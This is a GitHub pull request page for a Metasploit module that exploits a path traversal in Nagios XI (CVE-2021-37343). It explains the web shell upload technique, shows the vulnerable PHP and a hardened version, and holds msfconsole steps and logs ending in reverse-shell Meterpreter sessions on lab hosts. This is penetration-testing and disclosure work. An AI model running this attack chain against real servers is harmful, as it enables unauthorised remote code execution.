
Nagios XI Web Shell Upload Module (CVE-2021-37343) #16150

Merged (6 commits), Feb 11, 2022

Conversation

@jbaines-r7 (Contributor)

Description

This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as www-data. The module achieves this by creating an autodiscovery job with an id field containing a path traversal to a writable and remotely accessible directory, and a custom_ports field containing the web shell. A cron file will be created using the chosen path and file name, and the web shell is embedded in the cron file.

After the web shell has been written to the victim, this module will then use the web shell to establish a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the autodiscovery job is removed as well.

Additional Details

I tied the module into @ErikWynter's Nagios XI scanner (great stuff, Erik!). I only needed to slide in identifying information and all worked well. Rubocop had a few things to say about rce_check.rb that made the diff slightly bigger, but nothing crazy. msftidy does have two complaints still about rce_check.rb; I would have fixed them, but they are absolutely meaningless to me. Hopefully a reviewer can provide guidance:

albinolobster@ubuntu:~/metasploit-framework$ ./tools/dev/msftidy.rb lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb
lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb - [ERROR] Unable to determine super class
lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb - [ERROR] Missing "Description" info, please add

One thing I opted not to include in the module was the finish install logic that appears in a couple of other Nagios modules. The same logic appears in nagios_xi_scanner so it didn't seem right to copy and paste into my module as well.

The final oddity is that I left the affected versions to be 5.2.0 >= x < 5.8.5. Pre-5.2.0 is super old and I didn't feel like it was necessary to go spelunking back any further. Interestingly, the code at 5.2.0 is actually vulnerable to command injection (not just path traversal), I guess that probably received some sort of CVE along the way.

Here is the vulnerable bit at 5.2.0 (the issue is $tmpfile):

function autodiscovery_component_update_cron($id)
{
    $croncmd = autodiscovery_component_get_cron_cmdline($id);
    $crontimes = autodiscovery_component_get_cron_times($id);

    $cronline = sprintf("%s\t%s > /dev/null 2>&1\n", $crontimes, $croncmd);
    $tmpfile = get_tmp_dir() . "/scheduledreport." . $id;
    file_put_contents($tmpfile, $cronline);

    $cmd = "crontab -l | grep -v '" . escapeshellcmd($croncmd) . "' | cat - " . $tmpfile . " | crontab - ; rm -f " . $tmpfile;
    exec($cmd);
}

vs. 5.8.4:

function autodiscovery_component_update_cron($id)
{
    $croncmd = autodiscovery_component_get_cron_cmdline($id);
    $crontimes = autodiscovery_component_get_cron_times($id);

    $cronline = sprintf("%s\t%s > /dev/null 2>&1\n", $crontimes, $croncmd);
    $tmpfile = get_tmp_dir() . "/scheduledreport." . $id;
    file_put_contents($tmpfile, $cronline);

    $cmd = "crontab -l | grep -v " . escapeshellarg($croncmd) . " | cat - " . escapeshellarg($tmpfile) . " | crontab - ; rm -f " . escapeshellarg($tmpfile);
    exec($cmd);
}
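As an added example (not code from this PR or from Nagios XI), here is the same update_cron flow with the $id value validated before it can reach either the filesystem path or the shell command. The helper functions get_tmp_dir, autodiscovery_component_get_cron_cmdline and autodiscovery_component_get_cron_times are stand-in stubs so the file runs on its own; the script path inside the cmdline stub is a placeholder.

```php
<?php
// Added example, not Nagios XI code. Stubs stand in for the real helpers so
// the file runs stand-alone; the script path below is a placeholder.
function get_tmp_dir() { return sys_get_temp_dir(); }
function autodiscovery_component_get_cron_cmdline($id) { return "/path/to/autodiscover.php --job=$id"; }
function autodiscovery_component_get_cron_times($id) { return "0 * * * *"; }

// Build the temp-file path only from a validated integer job id and confirm
// the resulting path still lives under the temp directory.
function scheduledreport_tmpfile($id)
{
    // Job ids are integers; anything else (including "../") is rejected here,
    // before it is ever concatenated into a path.
    if (filter_var($id, FILTER_VALIDATE_INT) === false || (int)$id < 0) {
        throw new InvalidArgumentException("invalid autodiscovery job id");
    }
    $tmpdir  = realpath(get_tmp_dir());
    $tmpfile = $tmpdir . "/scheduledreport." . (int)$id;
    // Belt and braces: the final path must remain inside the temp directory.
    if ($tmpdir === false || strpos($tmpfile, $tmpdir . "/") !== 0) {
        throw new RuntimeException("temp file escapes temp directory");
    }
    return $tmpfile;
}

function autodiscovery_component_update_cron_hardened($id)
{
    $tmpfile   = scheduledreport_tmpfile($id);   // throws on a traversal-shaped id
    $croncmd   = autodiscovery_component_get_cron_cmdline((int)$id);
    $crontimes = autodiscovery_component_get_cron_times((int)$id);
    $cronline  = sprintf("%s\t%s > /dev/null 2>&1\n", $crontimes, $croncmd);
    file_put_contents($tmpfile, $cronline);
    // Every interpolated value is a single quoted shell argument (escapeshellarg),
    // matching the 5.8.4 change shown above.
    $cmd = "crontab -l | grep -v " . escapeshellarg($croncmd)
         . " | cat - " . escapeshellarg($tmpfile) . " | crontab - ; rm -f " . escapeshellarg($tmpfile);
    return $cmd; // returned instead of exec()'d so the example never touches crontab
}

// Demo with two constructed ids: a normal one and a traversal-shaped one.
foreach (['42', '../../html/includes/components/highcharts/exporting-server/temp/x.php'] as $id) {
    try {
        echo autodiscovery_component_update_cron_hardened($id), "\n";
    } catch (Exception $e) {
        echo "rejected '$id': ", $e->getMessage(), "\n";
    }
}
```

The second id is rejected by the integer check before any file is written, which is the point at which the original code already had committed to a user-controlled path.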

Verification

Install Nagios XI 5.8.4 as described in the module's documentation.

  • Start msfconsole
  • use auxiliary/scanner/http/nagios_xi_scanner
  • set RHOST <ip>
  • set PASSWORD <password>
  • run
  • Verify the host is flagged as vulnerable and exploit/linux/http/nagios_xi_autodiscovery_webshell is a suggested RCE module.
  • use exploit/linux/http/nagios_xi_autodiscovery_webshell
  • set RHOST <ip>
  • set PASSWORD <password>
  • check
  • Verify the target is flagged as vulnerable
  • set LHOST <ip>
  • run
  • You should get a Meterpreter session.

Video || GTFO

https://www.youtube.com/watch?v=ZhEvtjqFLVI

@jbaines-r7 changed the title from "Initial commit of CVE-2021-37343" to "Nagios XI Web Shell Upload Module (CVE-2021-37343)" on Feb 6, 2022
…h configuration, and used vars_get in a couple of places
@space-r7 space-r7 self-assigned this Feb 9, 2022
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@jbaines-r7 (Contributor, Author)

Retested after merging @space-r7's recent suggestion/commit in drop_shell; all appears well.

msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > check

[*] Attempting to authenticate to Nagios XI...
[*] 10.0.0.6:443 - The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/VzXDacREcR.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/VzXDacREcR.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/VzXDacREcR.php
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:39788 ) at 2022-02-09 12:39:21 -0800

meterpreter > shell
Process 258300 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)

@ErikWynter (Contributor)

Thanks for the mention @jbaines-r7! This looks great! I'm happy to hear you were able to get some use out of my mixin and scanner. If you ever have some extra time, there are several additional RCE vectors that were found in recent years that could still be added, like these. I was planning to look into that at some point, but I never got around to it.

@space-r7 (Contributor)

Here's a test on version 5.8.4 on Ubuntu 20.04.1:

msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set rhost 192.168.140.251
rhost => 192.168.140.251
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set password password
password => password
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/zHoNHcG.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/zHoNHcG.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 192.168.140.251
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/zHoNHcG.php
[*] Command Stager progress - 100.00% done (705/705 bytes)
[*] Deleting autodiscovery job
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.251:51722 ) at 2022-02-10 14:16:25 -0600

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.140.251
OS           : Ubuntu 20.04 (Linux 5.13.0-28-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

Regarding the msftidy output, msftidy is mostly intended for checking style, metadata, etc. for modules. I think if we're checking style for library code, running rubocop -a (or -A) <path> is preferred.

@jbaines-r7 (Contributor, Author)

I added the `ensure` in `exploit` as suggested and it had the desired effect. The job always gets cleaned up if created. Sample output:

msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
LHOST => 10.0.0.3
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/tQOcfcFJ.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/tQOcfcFJ.php
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Sending stage (989032 bytes) to 10.0.0.6
[*] Command Stager progress - 100.00% done (700/700 bytes)
[*] Deleting autodiscovery job
[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/tQOcfcFJ.php
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:39792 ) at 2022-02-10 17:29:26 -0800

meterpreter > quit
[*] Shutting down Meterpreter...

[*] 10.0.0.6 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DEPTH 2
DEPTH => 2
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/
[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/QPEmnezLx.php
[*] Testing if web shell installation was successful
[*] Deleting autodiscovery job
[-] Exploit aborted due to failure: unexpected-reply: Unexpected HTTP status code 404
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > 

@space-r7 space-r7 merged commit db00991 into rapid7:master Feb 11, 2022
@space-r7 (Contributor)

Release Notes

This exploits a path traversal vulnerability in Nagios XI versions below 5.8.5 to achieve authenticated code execution as the www-data user.

@space-r7 added the labels docs, module and rn-modules (release notes for new or majorly enhanced modules) on Feb 11, 2022
@jbaines-r7 jbaines-r7 deleted the nagios_xi_CVE_2021_37343 branch February 11, 2022 19:56
@SharonBrizinov

@jbaines-r7 cool module! But why not complete the chain with CVE-2021-37347 to get root? ;)
